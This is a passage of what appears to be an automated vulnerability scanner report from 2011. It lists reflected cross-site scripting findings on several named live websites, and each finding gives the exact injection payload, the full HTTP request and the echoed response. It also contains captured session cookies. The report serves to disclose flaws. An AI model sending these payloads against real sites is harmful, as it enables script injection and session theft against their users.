GET /m2/webroot/mbox/standard?mboxHost=www.webroot.com&mboxSession=1303044923199-20205&mboxPage=1303044923199-20205&screenHeight=1200&screenWidth=1920&browserWidth=1079&browserHeight=1016&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=US-land-ss-promo-freescan-pagewrapa56ed<script>alert(1)</script>7b64c0d8f47&mboxId=0&mboxTime=1303026923509&mboxURL=http%3A%2F%2Fwww.webroot.com%2FEn_US%2Fland-ss-promo-freescan.html&mboxReferrer=&mboxVersion=39&mboxXDomainCheck=true HTTP/1.1
Host: webroot.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.webroot.com/En_US/land-ss-promo-freescan.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1303044923199-20205; mboxPC=1303044923199-20205.17

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1303044923199-20205.17; Domain=webroot.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:58:00 GMT; Path=/m2/webroot
Content-Type: text/javascript
Content-Length: 229
Date: Sun, 17 Apr 2011 12:57:59 GMT
Server: Test & Target

mboxFactories.get('default').get('US-land-ss-promo-freescan-pagewrapa56ed<script>alert(1)</script>7b64c0d8f47',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303044923199-20205.17");
4.70. http://webroot.tt.omtrdc.net/m2/webroot/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webroot.tt.omtrdc.net
Path:   /m2/webroot/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 44d8b<script>alert(1)</script>66a3b0ec8df was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /m2/webroot/mbox/standard?mboxHost=www.webroot.com&mboxSession=1303044923199-20205&mboxPage=1303044923199-20205&screenHeight=1200&screenWidth=1920&browserWidth=1079&browserHeight=1016&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=US-land-ss-promo-freescan-pagewrap44d8b<script>alert(1)</script>66a3b0ec8df&mboxId=0&mboxTime=1303026923509&mboxURL=http%3A%2F%2Fwww.webroot.com%2FEn_US%2Fland-ss-promo-freescan.html&mboxReferrer=&mboxVersion=39 HTTP/1.1
Host: webroot.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.webroot.com/En_US/land-ss-promo-freescan.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1303044923199-20205.17; Domain=webroot.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:58:28 GMT; Path=/m2/webroot
Content-Type: text/javascript
Content-Length: 229
Date: Sun, 17 Apr 2011 12:58:28 GMT
Server: Test & Target

mboxFactories.get('default').get('US-land-ss-promo-freescan-pagewrap44d8b<script>alert(1)</script>66a3b0ec8df',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303044923199-20205.17");
4.71. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 26212<script>alert(1)</script>78fde6bcdfc was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///C%3A/Users/crawler/Documents/xss-dork-lawyers-cross-site-scripting-poc-example-report.html26212<script>alert(1)</script>78fde6bcdfc HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cm.BNlU3ABZHXPpB8PFLJNsjdDI.BZHXPpHWhprofile=1302162943; d=fefe6614082a299e480fa82a030f6b9ca66e5879ab6cfb62ab4c68eb320e6b6d; s_vi=[CS]v1|26CEB6F6850116A7-40000108E0006B5B[CE]; s_nr=1302162936988; traffic_control=-781655937076166248%3A200; s_vnum=1304754922563%26vn%3D2

Response

HTTP/1.1 200 OK
Age: 0
Date: Sat, 16 Apr 2011 15:38:08 GMT
Via: NS-CACHE: 100
Etag: "9858d7c55d55811a51331e91c7debbf68dbde3df"
Content-Length: 181
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Sat, 16 Apr 2011 15:48:07 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///C:/Users/crawler/Documents/xss-dork-lawyers-cross-site-scripting-poc-example-report.html26212<script>alert(1)</script>78fde6bcdfc", "diggs": 0});
4.72. http://wsdsapi.infospace.com/infomaster/widgets [qkwid1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wsdsapi.infospace.com
Path:   /infomaster/widgets

Issue detail

The value of the qkwid1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 405e1'%3balert(1)//58d1fc3843d was submitted in the qkwid1 parameter. This input was echoed as 405e1';alert(1)//58d1fc3843d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /infomaster/widgets?wid=pt&qkwid1=qkw405e1'%3balert(1)//58d1fc3843d&submitid1=sqkw HTTP/1.1
Host: wsdsapi.infospace.com
Proxy-Connection: keep-alive
Referer: http://www.info.com/?9857d%22-alert(document.cookie)-%221634c822576=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sun, 17 Apr 2011 14:28:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=cynPrBfSr6wOq0-qFaDs_K4AWxqbjFJYfMS4ue0Nu3EP7nbZjaWwwZQN4J4zs6cmIsld-_j2aIhk2g_1P2mafnr5hwE3zhwrC5fvIRJD0aAv6AUF6DKooFdV1RipdQgWbTW1aHTXUBHzJ0PZclM3hHqED5tp5xHkXgVnw3krlBW8btsG0; expires=Tue, 12-Mar-2013 01:08:05 GMT; path=/
Set-Cookie: ASP.NET_SessionId=v2zs5o455vktcdj4vlohjj3d; path=/
Set-Cookie: DomainSession=TransactionId=ea2c97e5d3dd40deb9005d11cdfccb01&SessionId=81862bbe4e154ba7974b5d11cdfccb01&ActionId=22cdec59af59446cbb715d11cdfccb01&CookieDomain=.infospace.com; domain=.infospace.com; expires=Sun, 17-Apr-2011 14:48:05 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=979777e4d1ef4fecb1535d11cdfccb01&LastSeenDateTime=4/17/2011 2:28:05 PM&IssueDateTime=4/17/2011 2:28:05 PM&CookieDomain=.infospace.com; domain=.infospace.com; expires=Tue, 24-Mar-2111 14:28:05 GMT; path=/
Cache-Control: public
Expires: Sun, 17 Apr 2011 15:28:05 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent
Content-Length: 11855


                                   // variable contructors
var txtElements = [{txt:'qkw405e1';alert(1)//58d1fc3843d',btn:'sqkw'}];var rfcIDElements = [];

// Disable autocomplete
var input1 = document.getElementById('qkw405e1';alert(1)//58d1fc3843d');input1.setAttribute('autocomplete','off');

function JSONscr
...[SNIP]...
4.73. http://wsdsapi.infospace.com/infomaster/widgets [submitid1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wsdsapi.infospace.com
Path:   /infomaster/widgets

Issue detail

The value of the submitid1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1889f'%3balert(1)//4c7b192af5d was submitted in the submitid1 parameter. This input was echoed as 1889f';alert(1)//4c7b192af5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /infomaster/widgets?wid=pt&qkwid1=qkw&submitid1=sqkw1889f'%3balert(1)//4c7b192af5d HTTP/1.1
Host: wsdsapi.infospace.com
Proxy-Connection: keep-alive
Referer: http://www.info.com/?9857d%22-alert(document.cookie)-%221634c822576=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sun, 17 Apr 2011 14:28:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=TblQjB3Kf3UeeA8Ddb6tIlxgfpinUzJcOoyXqCmtv1TGOwEwyN_iY0q2oOZmFvHwVcLj_9vunW8iA59R2Sa7AYvXBTDPrp6g4DYLuKzWKhalNt7QbNTj7ebK8lT6iy-4FgDmbSisXR4oP_ROlYIU_2ldcw0PSnA1nGJNabFUsw0smt020; expires=Tue, 12-Mar-2013 01:08:06 GMT; path=/
Set-Cookie: ASP.NET_SessionId=i3yvohbjrhxfuv2idjlidwe1; path=/
Set-Cookie: DomainSession=TransactionId=3755bccb16cf4086b6a55d11cdfccb01&SessionId=6aec8e48eda34c8a81885d11cdfccb01&ActionId=17685e97d218424cbffc5d11cdfccb01&CookieDomain=.infospace.com; domain=.infospace.com; expires=Sun, 17-Apr-2011 14:48:06 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=22769300428a417aa0da5d11cdfccb01&LastSeenDateTime=4/17/2011 2:28:06 PM&IssueDateTime=4/17/2011 2:28:06 PM&CookieDomain=.infospace.com; domain=.infospace.com; expires=Tue, 24-Mar-2111 14:28:06 GMT; path=/
Cache-Control: public
Expires: Sun, 17 Apr 2011 15:28:06 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent
Content-Length: 11831


                                   // variable contructors
var txtElements = [{txt:'qkw',btn:'sqkw1889f';alert(1)//4c7b192af5d'}];var rfcIDElements = [];

// Disable autocomplete
var input1 = document.getElementById('qkw');input1.setAttribute('autocomplete','off');

function JSONscriptRequest(fullUrl, query) {
// RE
...[SNIP]...
4.74. http://www.100zakladok.ru/save/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.100zakladok.ru
Path:   /save/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60141"><script>alert(1)</script>9b64324f456 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /save/?60141"><script>alert(1)</script>9b64324f456=1 HTTP/1.1
Host: www.100zakladok.ru
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:20:38 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=windows-1251
Content-Length: 8732

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>100zakladok.ru - .......... ...... ... ........ ..... ........-........</tit
...[SNIP]...
<a href="/save/?60141"><script>alert(1)</script>9b64324f456=1">
...[SNIP]...
4.75. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 91a11<script>alert(1)</script>451b4735667 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php91a11<script>alert(1)</script>451b4735667 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 17 Apr 2011 14:20:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=1hv6ufnjamb9mds53gfocv6570; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1378
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php91a11<script>alert(1)</script>451b4735667</strong>
...[SNIP]...
4.76. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21282"-alert(1)-"db41275acf8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php21282"-alert(1)-"db41275acf8 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 17 Apr 2011 14:20:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=mhkqrnaugp5kh6nhs0b28hgum2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php21282"-alert(1)-"db41275acf8";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPageTrac
...[SNIP]...
4.77. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1af27"-alert(1)-"3d4039de95d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php/1af27"-alert(1)-"3d4039de95d HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:20:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93891

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/1af27"-alert(1)-"3d4039de95d";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...
4.78. http://www.aerosocial.com/user_share.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aerosocial.com
Path:   /user_share.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8bd0"><img%20src%3da%20onerror%3dalert(1)>464ed54e568 was submitted in the REST URL parameter 1. This input was echoed as a8bd0"><img src=a onerror=alert(1)>464ed54e568 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /user_share.phpa8bd0"><img%20src%3da%20onerror%3dalert(1)>464ed54e568 HTTP/1.1
Host: www.aerosocial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:21:13 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: PHPSESSID=280e607399294214bca721ea793af478; path=/
Set-Cookie: se_language_autodetected=1; path=/
Content-Language: en
Content-Type: text/html
Content-Length: 21847


<!DOCTYPE html
   PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns='http://www.w3.org/1999/xhtml'>
<head>
<title>aero - the
...[SNIP]...
<select class='small' name='user_language_id' onchange="window.location.href='/profile.php?user=user_share.phpa8bd0"><img src=a onerror=alert(1)>464ed54e568&lang_id='+this.options[this.selectedIndex].value;">
...[SNIP]...
4.79. http://www.alltagz.de/bookmarks/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.alltagz.de
Path:   /bookmarks/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fba2"><script>alert(1)</script>0eb25d2f987 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmarks5fba2"><script>alert(1)</script>0eb25d2f987/ HTTP/1.1
Host: www.alltagz.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:20:52 GMT
Server: Apache/2.2.9 (Debian) DAV/2 SVN/1.5.1 mod_fastcgi/2.4.2 PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny10
Set-Cookie: PHPSESSID=f31196949f4a929d05a4fc5fde49f9a0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>alltagz: Favoriten online
...[SNIP]...
<a href="/bookmarks5fba2"><script>alert(1)</script>0eb25d2f987">
...[SNIP]...
4.80. http://www.allvoices.com/post_event [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allvoices.com
Path:   /post_event

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2a48"><script>alert(1)</script>d40146f6281 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /post_eventd2a48"><script>alert(1)</script>d40146f6281 HTTP/1.1
Host: www.allvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:20:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
X-QueryCount: 2
X-Runtime: 393ms
Pragma: no-cache
X-QueryRuntime: 0.00659
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Set-Cookie: _T_=byyxux8ut5qtqk1zlo97ex6rd; path=/; expires=Mon, 18 Apr 2011 02:20:53 GMT
Set-Cookie: page_url=http%3A%2F%2Fwww.allvoices.com%2Fpost_eventd2a48%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed40146f6281; path=/
Set-Cookie: masala_session_id=ca361ecf3d65fa664236be822f977a79; path=/
Content-Length: 27741
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<meta property="og:url" content="http://www.allvoices.com/post_eventd2a48"><script>alert(1)</script>d40146f6281"/>
...[SNIP]...
4.81. http://www.automasterlandrover.com/smartbrowse/ajax/new.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.automasterlandrover.com
Path:   /smartbrowse/ajax/new.htm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload 6a13d</noscript><script>alert(1)</script>7af8498f72f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowse6a13d</noscript><script>alert(1)</script>7af8498f72f/ajax/new.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=false&showTrim=false&showBodyStyle=false&showMileage=false&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: www.automasterlandrover.com
Proxy-Connection: keep-alive
Referer: http://www.automasterlandrover.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=63d606fa404638d9008b915da9d34eb2; JSESSIONID=1o9ay8sxhs37r; ddcpoolid=CmsPoolN; __utmz=1.1303052219.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=1.1930152101.1303052219.1303052219.1303052219.1; __utmc=1; __utmb=1.2.10.1303052219

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-8.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14379
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:57:09 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms9.pub.wc.dealer.ddc p7070 -->

   <title>The Automaster Land Rover | New Land Rover dealership in Shelburne, VT 05482</title
...[SNIP]...
</script>c5f2daa69&amp;20=www.automasterlandrover.com&amp;21=/smartbrowse6a13d</noscript><script>alert(1)</script>7af8498f72f/ajax/new.htm&amp;50=63d606fa404638d9008b915da9d34eb2&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-
...[SNIP]...
4.82. http://www.automasterlandrover.com/smartbrowse/ajax/new.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.automasterlandrover.com
Path:   /smartbrowse/ajax/new.htm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload ff7f2</noscript><script>alert(1)</script>16ce2972f0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowse/ajaxff7f2</noscript><script>alert(1)</script>16ce2972f0d/new.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=false&showTrim=false&showBodyStyle=false&showMileage=false&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: www.automasterlandrover.com
Proxy-Connection: keep-alive
Referer: http://www.automasterlandrover.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=63d606fa404638d9008b915da9d34eb2; JSESSIONID=1o9ay8sxhs37r; ddcpoolid=CmsPoolN; __utmz=1.1303052219.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=1.1930152101.1303052219.1303052219.1303052219.1; __utmc=1; __utmb=1.2.10.1303052219

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-8.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14379
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:57:09 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms9.pub.wc.dealer.ddc p7070 -->

   <title>The Automaster Land Rover | New Land Rover dealership in Shelburne, VT 05482</title
...[SNIP]...
</script>c5f2daa69&amp;20=www.automasterlandrover.com&amp;21=/smartbrowse/ajaxff7f2</noscript><script>alert(1)</script>16ce2972f0d/new.htm&amp;50=63d606fa404638d9008b915da9d34eb2&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=10&
...[SNIP]...
4.83. http://www.bibsonomy.org/BibtexHandler [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bibsonomy.org
Path:   /BibtexHandler

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7912f"><script>alert(1)</script>ffb7212d2e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /BibtexHandler7912f"><script>alert(1)</script>ffb7212d2e4 HTTP/1.1
Host: www.bibsonomy.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:21:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en
Via: 1.1 www.bibsonomy.org, 1.1 www.bibsonomy.org
X-Pingback: http://scraper.bibsonomy.org/xmlrpc
Vary: Accept-Encoding
Connection: close
Content-Length: 8080

